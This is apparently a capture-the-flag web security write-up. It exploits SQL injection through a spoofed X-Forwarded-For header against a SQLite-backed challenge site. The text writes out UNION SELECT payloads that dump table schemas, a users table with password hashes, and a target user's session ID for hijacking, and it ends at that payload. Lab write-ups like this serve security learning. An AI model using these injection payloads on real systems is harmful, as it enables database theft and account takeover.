Hello,
I’m about to share a WebSecurity WriteUp
Let’s Open the link and see what we have …
In this Challenge there is two hints:
-
The website store our IP address in database
-
Maria is the only person that can reveal the flag
The Source Code:
SELECT * FROM nxf8_sessions where ip_address = ‘...’
We send that to BurpSuite
Let’s Try to change our IP Address from headers via BurpSuite ….
X-Forwarded-For: 127.0.0.1
IP Changed
let’s see if there is possibilities of any SQL injection ….
let’s reduce the number of columns to avoid the error message
So we have a SQLi …. (I can’t explain more those are basics as we know Just follow the pics …)
We are dealing with SQLite here
I found two tables:
nxf8_sessions
nxf8_users
Let’s grab columns via an easy method
X-Forwarded-For: 127.0.0.1’ UNION SELECT 1,2,3,sql FROM sqlite_master WHERE type =’table’ AND name = ‘nxf8_sessions’ LIMIT 0,1 — -
And for users
X-Forwarded-For: 127.0.0.1’ UNION SELECT 1,2,3,sql FROM sqlite_master WHERE type =’table’ AND name = ‘nxf8_users’ LIMIT 0,1 —
From users I found that Maria ID is : 5
ID:
1,2,3,4,5,6,7,8
NAME:
Alex,Trevor,Jacob,Paul,Maria,Mira,Michael,Joshua
PASSWORD:
f7af8e099d32a7d4de771c47d7d21000eb073c77,b6d435bbaa57016efe1f67b11f88fb47a459180a,7a19fdecb23571ed265321c9f764e6a6f81f3373,20af2164daf4bfaa73d89229782b8f01686584fe,d3e1330bac4810f24a5cd3d5a0e5a74e5d4c05c2,2f7a7814f81e84ecc4d73e8fd245fa603065632a,b19213f749af5e451d5f7ee4be0147294eea1709,506f329f5e6f5b456900b9f5ef6a308890d52cfc
EMAIL:
[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected]
And in our challenge there is no login pages or anything let us to get the flag and its required to use Maria as an user ….
I tried to crack the password but nothing and after a while I get back to our “nxf8_sessions” Table
X-Forwarded-For: 127.0.0.1’ UNION SELECT 1,2,3,session_id FROM nxf8_sessions WHERE user_id =5 LIMIT 0,1 — -
